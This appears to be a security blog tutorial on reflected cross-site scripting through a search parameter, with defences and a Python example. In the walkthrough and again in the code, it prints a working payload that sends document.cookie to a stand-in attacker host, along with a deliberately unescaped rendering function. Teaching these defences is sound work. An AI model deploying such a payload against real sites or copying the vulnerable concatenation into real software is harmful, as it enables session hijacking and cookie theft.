Overview
Hello! When building a website, you need to make sure that user-supplied JavaScript is never returned to the browser. Last time I wrote about Stored-XSS, which allows an attacker to store malicious JS in the server's database, so every other user who visits the page containing that code is affected too. Unlike Stored-XSS, Reflected-XSS exploit code is not stored on the server at all. In this article, we will explore this other way an attacker can use XSS to deliver malicious JS, called Reflected XSS.
If your website takes data from a user's HTTP request and echoes it back to them in the response, you have opened another vector through which a third party can inject malicious JavaScript. Let's see how it works.
How it works
The familiar character in these posts is Mal. He finds a search function on your website that has a problem, and he is going to exploit it.
He knows that the search keyword in the URL is displayed on the search results page, and he wonders whether it is escaped.
To check, he edits the URL and puts a JS snippet in the search param: www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
When he opens the link in his browser, the JS executes and redirects him to haxxed.com?cookie=asFFEfn222fefeknladf (his malicious site) … yep, poor u )
Now he proceeds to deceive someone, such as poor Vic, the unfortunate character in this series )
Mal sends Vic an email with a tempting link that points to the edited URL.
Vic clicks the link. The page renders the search parameter in HTML without properly escaping it, so a new <script> tag is generated:
```html
<div class="search-terms">
  Search results for "<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>"
</div>
<h6>No results found</h6>
```
The script runs as soon as the page loads, and with no visible sign ) Vic is redirected to a separate website with his cookies attached. Mal then checks the log of his own server and hijacks Vic's session:
```
http://www.haxxed.com?cookie=asdfefefffasdfCsdfnE
http://www.haxxed.com?cookie=engkelfiAnlJreklfNkl
http://www.haxxed.com?cookie=SneklfjsdkleekflaAne
http://www.haxxed.com?cookie=asFFEfn222fefeknladf
```
Risk
This is a common, easy-to-exploit and dangerous error. It is not as dangerous as a stored XSS attack, but it is much more common.
This vulnerability is easy to overlook in the code review, because often we will mainly check the stored data. Be especially careful when checking the following page types:
- Search Results
- Error pages
- Form submissions
In the example above the vulnerable request used the GET method, but POST requests should be checked just as carefully. Even if you use CSRF protection, the attacker can still find a way around it to carry out this attack.
Protect
Make sure that the dynamic content you return cannot inject JavaScript.
- Escape dynamic content
- Whitelist Values
- Implement a Content-Security Policy
To implement a Content-Security Policy, you can use a <meta> tag in <head> with the following content:
```html
<meta http-equiv="Content-Security-Policy" content="script-src 'self' https://apis.google.com">
```
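As an added example (not code from the original post), here is a minimal Python version of the walkthrough's search page that ties the three protections together: the vulnerable concatenation from the "How it works" section beside an escaped version, a hypothetical whitelist for the search term (the pattern is an assumption), and the CSP from the <meta> tag sent as a response header instead.

```python
import html
import re

# Constructed input: the same payload Mal places in the search parameter in the article.
PAYLOAD = '<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>'

# Hypothetical whitelist policy (an assumption): letters, digits, spaces, dashes, max 64 chars.
ALLOWED_TERM = re.compile(r"^[A-Za-z0-9 \-]{1,64}$")

# The same policy the article's <meta> tag declares, sent as a response header.
CSP_POLICY = "script-src 'self' https://apis.google.com"


def render_vulnerable(term: str) -> str:
    """The bug from the walkthrough: the raw term is concatenated into the HTML."""
    return ('<div class="search-terms">Search results for "' + term + '"</div>'
            '<h6>No results found</h6>')


def render_escaped(term: str) -> str:
    """Fix 1, escape dynamic content: <, >, & and quotes become entities, so no tag forms."""
    safe = html.escape(term, quote=True)
    return ('<div class="search-terms">Search results for "' + safe + '"</div>'
            '<h6>No results found</h6>')


def is_whitelisted(term: str) -> bool:
    """Fix 2, whitelist values: reject anything outside the expected character set."""
    return ALLOWED_TERM.fullmatch(term) is not None


def respond(term: str):
    """Fix 3 on top of 1 and 2: return (status, headers, body) with a CSP header set."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP_POLICY,
    }
    if not is_whitelisted(term):
        # Escaping would already be safe; whitelisting lets us refuse junk outright.
        return 400, headers, "<h6>Invalid search term</h6>"
    return 200, headers, render_escaped(term)


def reflects_script_tag(body: str) -> bool:
    """Check used by the tests: does the response contain a live <script> tag?"""
    return "<script>" in body.lower()
```

Run `respond(PAYLOAD)` and `respond("laptop bag")` to see the payload rejected and a normal term rendered; `render_vulnerable(PAYLOAD)` reproduces the HTML from the walkthrough.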
Summary
The above is a basic introduction to Reflected-XSS; I hope it helps you avoid this security error. Thanks for reading, and happy coding!